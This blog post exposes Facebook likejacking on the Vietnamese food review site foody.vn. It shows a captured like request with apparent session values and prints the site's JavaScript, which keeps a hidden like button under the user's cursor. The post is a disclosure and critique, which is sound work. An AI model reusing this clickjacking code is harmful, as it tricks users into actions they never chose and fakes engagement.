Thursday, February 27, 2014

foody.vn and Facebook likejacking


Share/Bookmark
http://foody.vn, a Vietnamese startup invested by CyberAgent Ventures last year (http://e27.co/cyberagent-ventures-invests-in-vietnam-food-review-site-foody-vn/)

I am watching around and noticed that they are doing shit-trick called facebook likejacking as the screenshot below:

A POST request to facebook will be generated when you click the close button at the top-right corner.
It was blocked by my antivirus, sorry foody!

Look into the detail header of this request:


Request URL: https://www.facebook.com/plugins/like/connect
Request Headers CAUTION: Provisional headers are shown.

Content-Type: application/x-www-form-urlencoded

Origin: https://www.facebook.com

Referer: https://www.facebook.com/plugins/like.php?href=https://www.facebook.com/FoodyVietnam&send=false&layout=button_count&width=450&show_faces=false&font&colorscheme=light&action=like&height=21&appId=349480478502595

User-Agent:
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36

Form Data
fb_dtsg: AQDBhOAV
href: https://www.facebook.com/FoodyVietnam
action: like
nobootload:
iframe_referer: http://www.foody.vn/
ref:
__user: 1117881115
__a: 1
__dyn: 7wfGbwKBAo
__req: 1
ttstamp: 265816866104796586
__rev: 1139153


So what happens behind that? The hidden like button is under the close button. By modifying css  it will appear:

















Javascript function to check status of the current user to do their rat trick:
window.fbAsyncInit = function () {
    FB.init({
        appId: "395614663835338",
        channelUrl: "http://www.foody.vn/channel.html",
        status: !0,
        cookie: !0,
        xfbml: !0,
        frictionlessRequests: !0
    }), $(function () {
        var a = $("#fbLike");
        a.length > 0 && FB.getLoginStatus(function (b) {
            if (b.status == "not_authorized" || b.status == "connected") {
                var c = $.cookie("fbCookie");
                c ? a.remove() : $(document).mousemove(function (b) {
                    a.css({
                        left: b.pageX - 15 + "px",
                        top: b.pageY - 3 + "px"
                    }), $(document.activeElement).attr("id") == "fbIframe" && ($.cookie("fbCookie", "1", {
                        expires: 5,
                        path: "/"
                    }), $.cookie("fbPro", provinceId || 217), a.remove())
                })
            }
        })
    })
},
You can see the detail source here: http://static.foody.vn/Scripts/public.core.min.js
Backup code: public.core.min.js_part1 , public.core.min.js_part2
At this time, foody's facebook page has more than 240k like, how many of them are real;)

//After the basic review above, now we can take a deeper inside the real likejacking of foody.vn.
See the video pls ;)... Dog tail appears soon!